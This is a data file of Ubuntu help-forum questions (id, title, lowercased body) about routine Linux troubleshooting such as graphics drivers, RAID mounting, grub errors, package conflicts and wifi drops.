343158	laptop runs hot in ubuntu 13.04	i have a dell studio xps 1640 . it has an amd radeon hd 4600 series graphics card . i looked up the common heat issues and it said that usually the graphics driver is to blame and once the proprietary is installed it gets fixed . ive tried to install the proprietary drivers from amd and when i install catalyst and reboot i ca n't get to my desktop anymore . unity does n't load and i am forced to uninstall the driver via the command line in order to get things working again . i think it is a common issue right now but any idea what i should do ?
343160	intel graphics driver crash	i have a lenovo g560 laptop , on which i have played sims 3 on and off for quite some time . i started playing again and now it goes black then comes back saying my intel graphics driver crashed and successfully recovered . it does this 5 or 6 times in a row then the computer freezes and i have to restart . once it even brought me to a blue screen . hellpppp ? ?
343162	how to convert .pcapng files to .pcap/.tcpdump files ?	i have a a few folders with 300 to 400 files each . the files are wireshark captures in .pcapng format . i would like to write a shell script that opens every file and saves it into a new folder using wireshark .tcpdump format .
343166	i turned off signing in with password - now i can not authenticate for admin tasks	when i turned off sign in with a password and when i went to go install programs and the password menu pops up so it will install the program . it says i have the wrong password when i type in my password .
343169	unable to install vmware tools and get vm full-screen	i am running ubuntu 13.04 with vmware player 6 and i can not get the vm to full screen or install the vmware tools on the vm . the vm is windows 7. any ideas on how to full screen the vm ?
343172	add apache2 vhost at home	i just installed apache2 on mint 15 . i am able to see the localhost and so decided to add virtual hosts for my projects . i have added the hostnames at /etc/hosts 127.0.0.1 eclipse i also added vhost details at /etc/apache2/site-avaliable : < virtualhost *:80 > serveradmin webmaster @ eclipse servername eclipse serveralias www.eclipse # indexes+document root directoryindex index.html index.php documentroot /home/cygnus/dropbox/workspace_eclipse # logfiles errorlog /var/log/apache2/eclipse-error.log customlog /var/log/apache2/eclipse-access.log combined < directory /home/cygnus/dropbox/workspace_eclipse > options indexes followsymlinks allowoverride all order deny , allow deny from all allow from 127.0.0.1 < /directory > < ifmodule dir_module > directoryindex index.php index.html < /ifmodule > < /virtualhost > i activated the vhost using : sudo a2ensite example.com also added following to /etc/apache2/httpd.conf servername localhost servername eclipse after all the work i checked in browser : http : //localhost - works ok. http : //eclipse - gives 403 error . i used chown and chgrp to set owner and group as : www-data and root - neither worked . do i need to do anything more to add vhost in linux ? did i miss or mess up some step ? any help is appreciated - thanks in advance : ) update : i tried changing the documentroot to `` /var/www/test/ '' - this works but i need it to work at home level .
343174	ca n't find my files	i am using ubuntu 12.04 lts and i reinstalled it for some reason . earlier my /home was different from / . after reinstalling ubuntu , i ca n't find my files ( documents , downloads , music , etc ) even when it is showing occupied space correctly , but the folders are empty . help ! here is my /home : gurmeet @ gurmeet : ~ $ ls -l /home total 20 drwxr-xr-x 24 gurmeet gurmeet 4096 sep 9 13:25 gurmeet drwx -- -- -- 59 root root 16384 jul 29 02:34 lost+found
343176	mount raid volume command line	i have a 3tb raid , which was made originally with open media vault , a media server . i have recently uninstalled open media vault from the server and installed ubuntu 13.10 . the only problem i 'm having is that i ca n't mount the raid disks and i don '' t want to lose the data at all , it 's all my vital information . here 's what i 've tried : mkdir /media/3tbraid // and then the mount command sudo mount -t ext4 /dev/sdd/ /media/3tbraid this returns 'mount : wrong fs type , bad option , bad superblock on /dev/sdd , missing codepage or helper program , or other error . in some cases useful info is found in syslog - try dmesg | tail or so' i 'm fairly new to linux in general , so please do n't yell at me : ) the two drives , that i actually want to mount as one are device : 1 : /dev/sdd 2 . /dev/sdc the type of both of these drives are 'linux_raid_member' could someone please help me on how to correctly mount the two drives as one without loosing my data ? thankyou !
343177	unable to use super grub disk	i have a lenovo z500 with dual boot windows 8 and ubuntu 13.04 . recently i deleted the linux partition ( from windows disk manager ) but did not remove the boot loader.now the next time i booted it gave the following error . no such partition found grub rescue i tried to make a super grub disk but when i insert it in the machine nothing happened it still gave the same response . please help .
343178	dash is not behaving normal in ubuntu 13.04	there is a whitish rectangle in the left-bottom corner and the top-left corner is turning dark and blinking for a while when i click on something in dash . it did not happen in quantal or precise .
343182	xubuntu 12.04 does n't seem to have option to not `` sleep '' computer	when i right-click on the battery and pursue the ac power setting options , there is no option to not put the computer to sleep . is there a work around for this ? i want to transfer file all night .
343183	data recovery fantom external hard drive 6 tb ( two 3tb drives on raid 0 )	i have a fantom 6tb external hard drive that uses two 3tb hard drives . on the back it has two switches for setting up raid . i have it set to raid 0 so i can use the full 6tb . the problem with it is that it wo n't power on . so i pulled the hard drives out to get to the data . and for those of you wondering i did buy a new power supply and i changed the cooling fan inside it and still no power . i put the two 3tb hard drives in my computer then went into the bios and whiched the sata controller to raid . after that i booted into to ubuntu 12.04 and i noticed that they were n't mounted . so i opened disk utility and i can see the two drives there but i can not mount them . i assume the reason is that the two drives were previously being used in raid 0 and i need to set up the raid array in disk utility but i do n't quite know what i am doing and i do n't want to lose the data . oh and yes my motherboard does support 3tb .
343184	libpng15.so.15 , can not open shared object file	i recently downloaded a binary of blender , and upon running it on got the following error : jdphenix @ jdphenix : ~/blender/blender_59865 $ ./blender ./blender : error while loading shared libraries : libpng15.so.15 : can not open shared object file : no such file or directory my first thought was to search for libpng using apt-cache , but no versions matched what blender was looking for , so i downloaded the libpng v15 source from http : //sourceforge.net/projects/libpng/files/libpng15/ and built it using the normal ./configure , make install type routine . after this , i still got the same error , so i checked whereis : jdphenix @ jdphenix : ~/blender/blender_59865 $ whereis libpng15.so.15 libpng15.so : /usr/local/lib/libpng15.so /usr/local/lib/libpng15.so.15 it where i expected it to be . checked http : //wiki.blender.org/index.php/doc:2.6/manual/introduction/installing_blender/directorylayout and saw blender -- help . no dice , because it requires libpng15.so.15 to even do that . at this point , i feel that i might be missing something fundamental here . is there something else i can break/unbreak/try to get this up and running ?
343187	wsnet simulator : segmentation fault ( core dumped ) during installation	i installed wsnet simulator about one month ago and everything was ok ( i had any problem ) . now i uninstalled wsnet ( sudo rm –r /usr/local/wsnet.2 ) i want to install it again and i follow install steps in this web page . in step 3 when i use make command i get this error : rng.c : in function ‘create_rng’ : rng.c:164:14 : error : variable ‘r’ set but not used [ -werror=unused-but-set-variable ] cc1 : all warnings being treated as errors make [ 3 ] : *** [ wsnet-rng.o ] error 1 make [ 3 ] : leaving directory `/home/administrator/wsnet/src ' make [ 2 ] : *** [ all-recursive ] error 1 make [ 2 ] : leaving directory `/home/administrator/wsnet/src ' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/administrator/wsnet ' make : *** [ all ] error 2 because of this error i disable ( clear ) -werror flag in configure.ac files and i type “make” command again . with this hack it works and “make” process finishes without any error . or i use gcc.4.4.7 and it compile code without any warning . then i type another command “sudo make install ” and it install wsnet in its location . now when i run every simulation config files such as cbr.xml xy.xml etc . i get this error : ... entity 'battery ' ( 9 ) using model : energy_linear using plugin : /usr/local/wsnet-2.0/lib//libenergy_linear.so author : guillaume chelius version : 0.1 description : linearly decreasing battery environment using propagation : range propagation range : 30.000000 using interferences : interf modulation : none bundle 'sensor ' ( 0 ) worldsens : 0 mobility : static number of entities : 7 static battery omnidirectionnal up : radio radio up : mac down : omnidirectionnal mac up : routing down : radio routing up : cbr down : mac cbr down : routing ***segmentation fault ( core dumped ) *** i think this error occurs after i updated my os ( ubuntu ) using update manager . for example gcc compiler in this version gets warrings as an error . when i run this program with gdb i get this back trace : program received signal sigsegv , segmentation fault . 0xb7ee2e5e in gsl_ran_flat ( ) from /usr/lib/libgsl.so.0 ( gdb ) bt # 0 0xb7ee2e5e in gsl_ran_flat ( ) from /usr/lib/libgsl.so.0 # 1 0x080504c9 in uniform ( ) # 2 0x0804fd0d in get_random_x_position ( ) # 3 0xb78e07dc in setnode ( ) from /usr/local/wsnet-2.0/lib//libmobility_static.so # 4 0x08054d9c in parse_nodes ( ) # 5 0x0804e938 in do_configuration ( ) # 6 0x0804d827 in main ( ) i roll back to pervious version of gsl , gcc ( 4.4.7 ) library but it do n't solve my problem .
343195	unable to write the license-key in office 2010 via wine	i have a linux ubuntu 13.04 with wine 1.5 . i 've tried to install an office 2010 professional plus , but when i had to write the license-key , i ca n't write anything . the text-box is unable to write ... : ( any suggestions how i can solve this problem ? thanks in advance , greetings omaggi .
343196	ubuntu 12.04 screen orientation issue	installed 12.04 lts in my pc and there is no problem for display . but when i connect my pc to my lcd tv ( sony bravia bx 300 ) , its not detecting the screen orientation , ie it only detects 1280*7xx ( 4:3 orientation ) so that it seems stretched , but my tv has 16:9 orientation screen . note : when i was using 10.04 lts there was no problem .
343200	man user name problem	i have a user on my ubuntu 13.04 that his username is : me and his name is man also i do not know the difference between user name and his name ( in user accounts he is displayed as : man me i have had no problem with this user until i decided to install truecrypt . after downloading `` truecrypt-7.1a-linux-x64.tar.gz '' and extracting it , a file is created with filename = truecrypt-7.1a-setup-x64 i tried to install truecrypt by running this file , but no success . i tried sudo as well , but there was no success yet . after running nautilus by sudo and looking at files permission tab , the permission was : -rw -- -- -- - and the owner was : `` man '' but the group was `` me '' tring to change the group permission of the file to `` read only '' results following error : **the owner could not be found** sorry , could not change the owner of `` truecrypt-7.1a-setup-x64 '' : specified owner 'man ' does n't exist and nautilus is closed immediately is there any one who could help me to : 1 ) understand the difference between the username ( me ) and his name ( man ) 2 ) how to solve my problem in changing the permission of that file and installing truecrypt ?
343203	choppy sound with random popping 13.04	i was hoping some one could help me figure out why my audio is popping randomly . i just got some new speakers and it was popping previously , but i was using monitor speakers so it was n't really noticeable . now i have some bose speakers hooked up via an analog cable . it is not the speakers because my android phone plays audio fine . when i open the sound settings window the popping happens at exactly the same time a third sound device is displayed very quickly and then disappears . this keeps happening at about 30 second intervals . any help is appreciate . if you need more details just let me know how to get them .
343205	where can i find the mount point for smb shares in 13.04 ?	in older ubuntu releases , you were able to access the smb shares mounted with nautilus by going into the ~/.gvfs/ directory . i found it very convenient , since i like to use nautilus to mount the shares , but do all disk operations ( copy , mv , find etc . ) using command line . i now have ubuntu 13.04 , and even though i can mount the share and use it with nautilus ( which i never use ) , i am unable to find the actual mount point . is it still somewhere ? or has it been abandoned ? can i get it back ? i know that i can mount the shares using cifs and /etc/fstab , but i 'd rather use the user space . that way , when i install a new system or transfer my home to another machine , my preferences ( including credentials ) stay in my home directory and i do n't need to worry about updating fstab . also , i do not want to mount it manually with sudo ( with sudo mount -t cifs ... ) . yes , i could create an alias or a script , but then i would have to either type my password every time or store my password in a credentials file . and type the sudo password . and then each time i encounter a new share , i 'd need to remember how to create a credentials file . so yes , i might end up with this solution , but i would rather not change my current habits , if it is possible . furthermore , there is the matter of other users for which i often provide a simple command-line solution . in 13.04 , this is no longer possible ( for example , because the users to whom i provide the solution are not allowed to sudo mount on their machines ) . in any case , i 'm curious as to what happened to gvfs and why i ca n't see the mounted directories .
343210	grub rescue error while booting	i had a dual boot in my laptop windows 7 & ubuntu 13.04 . i recently deleted the ubuntu drive but it shows `` error : unknown filesystem . grub rescue > '' while booting . it is also not detecting any windows bootable cd . how do i remove this grub rescue error ?
343211	how can i setup raid0 on two drives ?	i have two 3tb drives that i want to raid0 . i have important files that i want backed up , and i believe that i 'm after raid0 . if that 's not correct please do n't hesitate to advise me otherwise . i have absolutely no idea how to do this , i 'm very new to linux in general , the version i 'm running is 13.10 , the drive names are as follows : drive1 = /dev/sdd drive2 = /dev/sde can i do this from command line ? i also believe that i should be using the ext4 type for the drive .
343215	black screen after logout	i have ubuntu 13.04 installed and normally i use mate as desktop viewer . after i logout and login with the default desktop viewer ( unity ? gnome ? ) the screen is black and just the ubuntu logo appears . i can work via console ( control+alt+f1 ) , how can i restart all with mate ?
343220	how to re-adduser after delete it ?	i have use sudo userdel alpha to delete user alpha and i want to add it back with sudo useradd alpha but after i useradd ubuntu did n't ask me about new password ? i add /home/alpha by root and change password for alpha , change the dir 's owner to alpha after i login it 's only have a $ nothing before it ! i used have alpha @ localhost $ ! how to fix it ?
343222	what 's the best way to backup files ?	i have a lot of personal files , which i 'd like to backup , however i do n't want to just copy & paste all the time from one drive to another . is there a better way of doing this ? i have been told that raid 5 is my best bet , is this true or are there better solutions ? thankyou
343223	trying to install ubuntu 13.04	i downloaded a 64 bit version of ubuntu 13.04 iso file and wrote it to a dvd . i restarted the computer with bios set to boot from dvd drive as first boot device . my computer now comes with ubuntu 12.04 displayed at the screen where it asks for your user password . i am wondering why it does not say 13.04 . i am trying to get movie player to play dvds but it will not load the addons . does anyone know how to get 13.04 on my computer or how to make movie player work ?
343225	how to make gedit align tab-separated values like it 's a table ?	i have a file like this : and i want it to be displayed like this : without adding extra tabs or spaces . is it possible with gedit ? is it possible with something else ?
343232	dpkg dependencies problem after removing mariadb , prevents me from using apt-get	i tried to install mariadb like this , and got this error : dpkg : error processing /var/cache/apt/archives/libmysqlclient18_5.5.32+maria-1~raring_amd64.deb ( -- unpack ) : libmysqlclient18 : amd64 5.5.32+maria-1~raring ( multi-arch : no ) is not co-installable with libmysqlclient18 which has multiple installed instances no apport report written because maxreports is reached already i tried to install mysql-server instead , but got : the following packages have unmet dependencies : libmariadbclient18 : depends : libmysqlclient18 ( = 5.5.32+maria-1~raring ) but 5.5.32-0ubuntu0.13.04.1 is to be installed mysql-server : depends : mysql-server-5.5 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . apt-get -f install does not work , though : dpkg : error processing /var/cache/apt/archives/libmysqlclient18_5.5.32+maria-1~raring_amd64.deb ( -- unpack ) : libmysqlclient18 : amd64 5.5.32+maria-1~raring ( multi-arch : no ) is not co-installable with libmysqlclient18 which has multiple installed instances i tried roll back , so sudo dpkg -r mariadb-servermariadb-client-core-5.5 mariadb-client-5.5 mariadb-server-core-5.5 which worked . mariadb-server is not installed apparently . then i tried sudo dpkg -r libmysqlclient18 but got : dpkg : dependency problems prevent removal of libmysqlclient18 : amd64 : amarok depends on libmysqlclient18 ( > = 5.5.13-1 ) . i do n't want to remove amarok as it has been installed for a long time . how can i solve this error and remove all of mariadb ? aptitude is not installed , and when i start ubuntu software center it tells me new software ca n't be installed , because there is a problem with the software currently installed . do you want to repair this problem now ? , when i click repair an internal error appears : as requested , output of sudo apt-get check : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libmariadbclient18 : depends : libmysqlclient18 ( = 5.5.32+maria-1~raring ) but 5.5.32-0ubuntu0.13.04.1 is installed e : unmet dependencies . try using -f. output of apt-cache policy libmysqlclient18 libmariadbclient18 : libmysqlclient18 : installed : 5.5.32-0ubuntu0.13.04.1 candidate : 5.5.32+maria-1~raring version table : 5.5.32+maria-1~raring 0 500 http : //ftp.osuosl.org/pub/mariadb/repo/5.5/ubuntu/ raring/main amd64 packages *** 5.5.32-0ubuntu0.13.04.1 0 500 http : //jp.archive.ubuntu.com/ubuntu/ raring-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ raring-security/main amd64 packages 100 /var/lib/dpkg/status 5.5.29-0ubuntu1 0 500 http : //jp.archive.ubuntu.com/ubuntu/ raring/main amd64 packages libmariadbclient18 : installed : 5.5.32+maria-1~raring candidate : 5.5.32+maria-1~raring version table : *** 5.5.32+maria-1~raring 0 500 http : //ftp.osuosl.org/pub/mariadb/repo/5.5/ubuntu/ raring/main amd64 packages 100 /var/lib/dpkg/status output of cat /etc/apt/sources.list /etc/apt/sources.list.d/*.list : # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //jp.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //jp.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //jp.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //jp.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //jp.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //jp.archive.ubuntu.com/ubuntu/ raring universe deb http : //jp.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //jp.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //jp.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //jp.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //jp.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //jp.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //jp.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //jp.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # unofficial repos http : //repogen.simplylinux.ch # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 3rd party binary repos # # # # google chrome browser - http : //www.google.com/linuxrepositories/ # # run this command : wget -q https : //dl-ssl.google.com/linux/linux_signing_key.pub -o- | sudo apt-key add - deb http : //dl.google.com/linux/chrome/deb/ stable main # # # # google earth - http : //www.google.com/linuxrepositories/ # # run this command : wget -q https : //dl-ssl.google.com/linux/linux_signing_key.pub -o- | sudo apt-key add - deb http : //dl.google.com/linux/earth/deb/ stable main # # # # midori ppa - https : //launchpad.net/~midori/+archive/ppa # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys a69241f1 deb http : //ppa.launchpad.net/midori/ppa/ubuntu raring main # # # # opera - http : //www.opera.com/ # # run this command : sudo wget -o - http : //deb.opera.com/archive.key | sudo apt-key add - deb http : //deb.opera.com/opera/ stable non-free # # # # oracle java ( jdk ) installer ppa - http : //www.webupd8.org/2012/01/install-oracle-java-jdk-7-in-ubuntu-via.html # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys eea14886 deb http : //ppa.launchpad.net/webupd8team/java/ubuntu raring main # # # # virtualbox - http : //www.virtualbox.org # # run this command : wget -q http : //download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -o- | sudo apt-key add - deb http : //download.virtualbox.org/virtualbox/debian raring contrib # # # # x updates - https : //launchpad.net/~ubuntu-x-swat/+archive/x-updates/ # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys af1cdfa9 deb http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu raring main # # # # # # # 3rd party source repos # # # # gimp ppa ( source ) - https : //launchpad.net/~otto-kesselgulasch/+archive/gimp # # run this command : sudo apt-key adv -- recv-keys -- keyserver keyserver.ubuntu.com 614c4b38 deb-src http : //ppa.launchpad.net/otto-kesselgulasch/gimp/ubuntu raring main # # # # midori ppa ( source ) - https : //launchpad.net/~midori/+archive/ppa # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys a69241f1 deb-src http : //ppa.launchpad.net/midori/ppa/ubuntu raring main # # # # oracle java ( jdk ) installer ppa ( source ) - http : //www.webupd8.org/2012/01/install-oracle-java-jdk-7-in-ubuntu-via.html # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys eea14886 deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu raring main deb http : //archive.canonical.com/ raring partner # deb-src http : //archive.canonical.com/ raring partner deb http : //ftp.osuosl.org/pub/mariadb/repo/5.5/ubuntu raring main # deb-src http : //ftp.osuosl.org/pub/mariadb/repo/5.5/ubuntu raring main deb http : //ppa.launchpad.net/atareao/atareao/ubuntu raring main # deb-src http : //ppa.launchpad.net/atareao/atareao/ubuntu raring main deb http : //ppa.launchpad.net/bhdouglass/indicator-remindor/ubuntu raring main # deb-src http : //ppa.launchpad.net/bhdouglass/indicator-remindor/ubuntu raring main deb http : //linux.dropbox.com/ubuntu precise main # deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu raring main
343235	ubuntu 13.04 - some radeon firmware files missing - low resolution problem	i have a msi hd6870 video card and i 'm using open source drivers . i have upgraded from kernel 3.8 to 3.11.0-031100 stable . after reboot i had low resolution problem , that is my maximum resolution is 1920x1080 but i can set and see only 1280x1024 as maximum resolution . i already had solved this problem removing the nomodeset option from /etc/default/grub when using kernel 3.8 . so i decided to install kernel 3.11 and the low resolution problem came back . it 's strange because the grub still has no nomodeset option now . i noticed that i have some radeon firmware files missing in kernel 3.11 that in kernel 3.8 was not , therefore i found this bug https : //bugs.launchpad.net/ubuntu/+source/linux-firmware/+bug/1183777 . they say that it has been solved with linux-firmware package v1.113 but i have linux-firmware 1.106 so maybe it 's due to kernel 3.11 has been released for ubuntu 13.10 and i have 13.04 , so how can i solve this firmware files missing ? i 'm assuming that the radeon firmware files missing is related to my resolution problem , but i 'm not sure so please tell me if i 'm wrong , if so how can i solve the resolution problem ? thanks
343239	computer freezes	sometimes my computer crashes and i 'm able not able to do anything . i try to use ctrl + shift + f1 or ctrl + rsys + reisub but these workarounds do n't work . here is my syslog . could you help me ?
343244	is there something similar to system restore in ubuntu	i would want to know if there is a command that can change my system back to the state at some point in time , including changing any files that may have been edited
343245	default user-group owner for /var folder	unfortunately i missed and suddenly change permission for whole /var folder content ( chown -r www-data : www-data ../../ , but i was inside /var/www_virthost/mydomain ) , what is wrong as i guess ; ) but the problem that i do n't remember who was the owner/group for next folders backups cache crash lib lob local lock - > /run/lock log mail opt run - > /run spool tmp www thanks
343249	frequent disconnections with awus036h on ubuntu 13.04	i 'm having a problem with disconnections with my alfa . i face the same problem on linux mint 15 . on windows though everything works perfect . $ iwconfig wlan2 ieee 802.11bg essid : '' ote5d8a0c '' mode : managed frequency:2.437 ghz access point : 20 : f3 : a3:5d:8a:14 bit rate=54 mb/s tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=61/70 signal level=-49 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:1 missed beacon:0 wlan1 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . lo no wireless extensions . $ nm-tool networkmanager tool state : connected ( global ) - device : wlan2 [ ote5d8a0c ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : rtl8187 state : connected default : yes hw address : 00 : c0 : ca:51:2b:9b capabilities : speed : 54 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) green n blue : infra , ac:86:74:0d:6c:22 , freq 2432 mhz , rate 54 mb/s , strength 45 wpa wpa2 govas : infra , 00:16 : b6 : e4:04:8c , freq 2437 mhz , rate 54 mb/s , strength 45 wep *ote5d8a0c : infra , 20 : f3 : a3:5d:8a:14 , freq 2437 mhz , rate 54 mb/s , strength 71 wpa conn-x91da80 : infra , cc:1a : fa:91 : da:80 , freq 2412 mhz , rate 54 mb/s , strength 54 wpa oteb35984 : infra , 00:26:44 : b3:59:84 , freq 2452 mhz , rate 54 mb/s , strength 44 wpa wpa2 ipv4 settings : address : 192.168.1.2 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 - device : wlan1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k_htc state : disconnected default : no hw address : 00:26 : f2:52 : d9 : e0 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 94 : de:80:2b : fe:78 capabilities : carrier detect : yes wired properties carrier : off $ sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : 94 : de:80:2b : fe:78 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:74 ioport : d000 ( size=256 ) memory : dc104000-dc104fff memory : dc100000-dc103fff *-network:0 description : wireless interface physical id : 1 bus info : usb @ 8:1.4 logical name : wlan2 serial : 00 : c0 : ca:51:2b:9b capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8187 driverversion=3.8.0-19-generic firmware=n/a ip=192.168.1.2 link=yes multicast=yes wireless=ieee 802.11bg *-network:1 description : wireless interface physical id : 2 bus info : usb @ 2:5.2 logical name : wlan1 serial : 00:26 : f2:52 : d9 : e0 capabilities : ethernet physical wireless configuration : broadcast=yes driver=ath9k_htc driverversion=3.8.0-19-generic firmware=1.3 link=no multicast=yes wireless=ieee 802.11bgn here is an output from iwscanner . at the end as you can it disconnected . what i have tried so far : 1 - i disabled the ipv6 for my alfa . i read in another question that this may cause some conflicts . 2 - $ sudo modprobe -rfv rtl8187 rmmod rtl8187 rmmod eeprom_93cx6 $ sudo modprobe -v rtl8187 insmod /lib/modules/3.8.0-19-generic/kernel/drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko so far the nothing worked . update i updated the kernel to 3.11 i install the compat-drivers ( backports ) http : //drvbp1.linux-foundation.org/~mcgrof/rel-html/backports/ so far the problem persists . note - i think i have found a pattern . the adapter rarely disconnects when i am just browsing . but when i am downloading somthing especially if it is big ( ex bigger than 100m ) it is more likely that it will disconnect . also , but this may be just in my mind , i think it disconnects after the download speed hits it 's peak . additionally i have noticed that after it disconnects , in the netwotk indicator the adapter is up and it lists all the available networks except mine ( the one it just disconnected from ) . what is going on ?
343255	why is update manager offering updates immidiately after network-connected-install ?	i am just curious . are there some packages that the installer can not download , or is this an accident , where updates got just uploaded to the server while i was rebooting after installation . ubuntu 13.04.3 update manager offered : kernel updates ( 3.8.0.29.29 - > 3.8.0.30.30 ) and many more ( 29 total ) i did not install updates anyhow , after ubuntu-installation was done it rebooted and updatemanager popped up with 29 updates ( although unsupported updates was ticked , but not anymore and i still get the same )
343258	how do i disable mini-http on boot ?	i 'd like to disable mini-http on boot . sudo /etc/init.d/mini-httpd disable the above command does not exist . only start|stop|restart|force-reloadoptions are available and these only stop the service till the next reboot . i am using ubuntu 12.04.3 lts .
343266	chrome wont install	so i am trying the ubuntu thing out right i finally got it up and running but i hate firefox and love chrome but i tried installing it like it said and this is what was said christina @ owner-laptop : ~ $ $ cd/tmp bash : /tmp : is a directory christina @ owner-laptop : ~ $ $ wget http : //dl.google.com/linux/direct/google-chrome-stable_current_i386.deb warning : root : could not open file '/etc/apt/sources.list' $ : command not found christina @ owner-laptop : ~ $ $ sudo dpkg -i google-chrome-stable_current_amd64.deb dpkg : error : requested operation requires superuser privilege christina @ owner-laptop : ~ $ i have been getting that message alot with anything i do with the sources.list so if anyones got an idea
343268	how to use manual partitioning during installation ?	i 'd like to see the full how-to on how to use manual partitioning during ubuntu installation . the existing guides ( at least those i found here ) cover only automatic part and leave untouched the manual part ( or extremely short and contain no pictures ) . i 'd like to cover such situations : if you have blank disk if your disk contains windows installed if your disk contains other systems if it is gpt , raid or lvm if you have a oem-preinstalled copy of windows 8
343270	shell not recognised by configuration scripts	when i try to compile different packages from source ( e.g. , ipsec-tools , openvpn , etc . ) i obtain always the same error from the configuration script : $ ./configure ./configure : this script requires a shell more modern than all ./configure : the shells that i found on your system . ./configure : please tell **** @ ***.org and ./configure : *** @ ***.org about your system , including ./configure : any error possibly output before this message . then ./configure : install a modern shell , or manually run the script ./configure : under such a shell if you do have one . on my system i 've a bash shell ( gnu bash version 3.00 ) . looking at those config scripts i 've noticed they support bash v.2 , so i do n't understand where the problem could be .
343277	problem with mouse and keyboard [ ubuntu 12.04.3 ]	i recently installed ubuntu 12.04.3 onto my computer but have run into some problems with the mouse and keyboard ( both wired ) . the latter is not recognised from the moment i choose ubuntu in the boot menu , the mouse on the other hand works fine for about 2-3 seconds on the log in screen . i was wondering if anybody has possible solution to this problem ?
343284	enforcing corporate desktop and short cuts on ubuntu 12.04 unity	how can i enforce the same desktop image and pre-created desktop shortcuts for all users on ubuntu 12.04 unity and prevent users from changing them please ?
